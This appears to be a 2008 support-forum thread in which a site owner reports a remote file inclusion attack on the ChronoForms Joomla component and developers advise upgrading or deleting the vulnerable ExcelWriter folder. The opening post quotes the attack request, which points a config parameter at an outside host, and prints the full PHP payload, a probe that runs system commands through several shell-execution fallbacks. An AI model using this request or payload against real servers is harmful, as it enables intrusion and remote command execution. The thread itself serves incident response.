Hacking attempts??

I just checked my access log and found entries, that look like hacking attempts.
Can someone with more knowledge in these things confirm that and tell me what to do?
I think I secured our website as good as possible and the hacking attempts obviously didnt work out, nevertheless it scares me, not to kn ow whats going on there...

69.72.142.138 - - [31/Jan/2008:05:24:30 +0100] "GET /~admin92//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://doodlepacific.com/public_html/images/articles/gif.txt? HTTP/1.1" 302 471 "-" "libwww-perl/5.808"

where this gif.txt contains the following:

<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"«»))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}
} 

there are some other entries, that are very similar ...<br><br>Post edited by: GreyHead, at: 2008/02/01 13:39

Hi,

I guess you don't have ChronoForms V2.3.7 ? if so then we have one of 3 solutions :

#1- upgrade to the latest version 2.3.7
#2- overwrite the folder excelwriter with the one in the latest version 2.3.7
#3- delete the whole excelwriter folder and don't use Excel backup of entries

Why this happened ? we used some script to create an excel file for database records but the script had some holes and we got it fixed at the latest release!

Please let me know if you have any comments!

Cheers,

Max

ok, I tried to upgrade (which did not work) but unsinstalled and installed 2.3.7.
Unfortunately, the backed up form could not be restored (it ran through but the fields where empty), but I copied the values manually out of the cfbak file ...

So this problem should be fixed!
I'm afraid, there is another one with the image verification: Klick4Thread

Thank you very much!<br><br>Post edited by: minimalniemand, at: 2008/02/01 12:10

Hi minimalniemand,

What happened with the upgrade? I've done several of these and they mostly run very smoothly. (Though with 2.3.5 to 2.3.6 I think you did need to open and re-save all the forms.)

Same with cfbak files - I've had twenty or more sent to me from different versions and they all open OK so far.

Bob

Hello

I think I have the same thing I upgraded today to 2.3.7

CHRONOFORMS version V2.3.5 has exploit

(Remote File İnclude Vulnerability )

which is published online I found it ,but its still new (2days ago )

I saw in google analytics "inurl:/com_chronocontact" sent 5 total visits

and when i searched I found more about it

I just want to know will upgrade to the latest version solves everything?

nothing to worry about? no infected files etc..?

and about these folders which in /administrator/chronocontact folder

can I delete (excelwriter) folder ???


thank you

Hi ahmedk,

The exploit uses the PEAR ExcelWriter module which ChronoForms uses for Excel data backup. If you have ChronoForms 2.3.7 OR delete the ExcelWriter folder (if you don't need Excel backup) OR you replace the ExcelWriter folder with the latest PEAR version then all will be OK with this exploit.

Bob

Hi Bob,

to that end,

could we get the Chronoforms version we're using echoed out to the main chronoforms page?

that would help - I'm using it in a number of places - and upkeep can be tough (I know I should keep better track🙂 )...

anyways - just a thought

Thanks!

Rod

Hi Rod,

I think that's a good idea. Max! Are you listening??

Bob

PS It should be possible to flag up when there is a new version too.

Hi GreyHead

The PEAR ExcelWriter module of version 2.3.5 is vulnerable?

I haven't found differences between the files of version 2.3.5 and those of version 2.3.8

where is the patch?

Thanks!

Hi MMMario,

I forget exactly which version had the update. Just take the
'excelwriter' folder from the latest release and ftp and copy it over the previous installation.

Bob

Hi Bob

Sorry but I don't understand

Currently I have installed version 2.3.5, the PEAR ExcelWriter module of this version is vulnerable?

I ask you this because the files of the PEAR ExcelWriter module of new version 2.3.8 are equal to those of version 2.3.5 I have currently installed.

If it is true that they are equal, why I would have to replace them with the new files?

Could you help me better understand?

Thanks!

Hi Mario,

Actually No, the 2 excelwriter files are not identical, the issue was with the $mosConfig global variable used and this was removed, you can check this!

Hi Bob, Ok, I will add this version checker to the new release!

Cheers,

Max

Hi MMMario,

As Max said there were some small but important changes in excelwriter between 2.3.5 and 2.3.8. Just to reassure myself I ran a comparison - see here.

Bob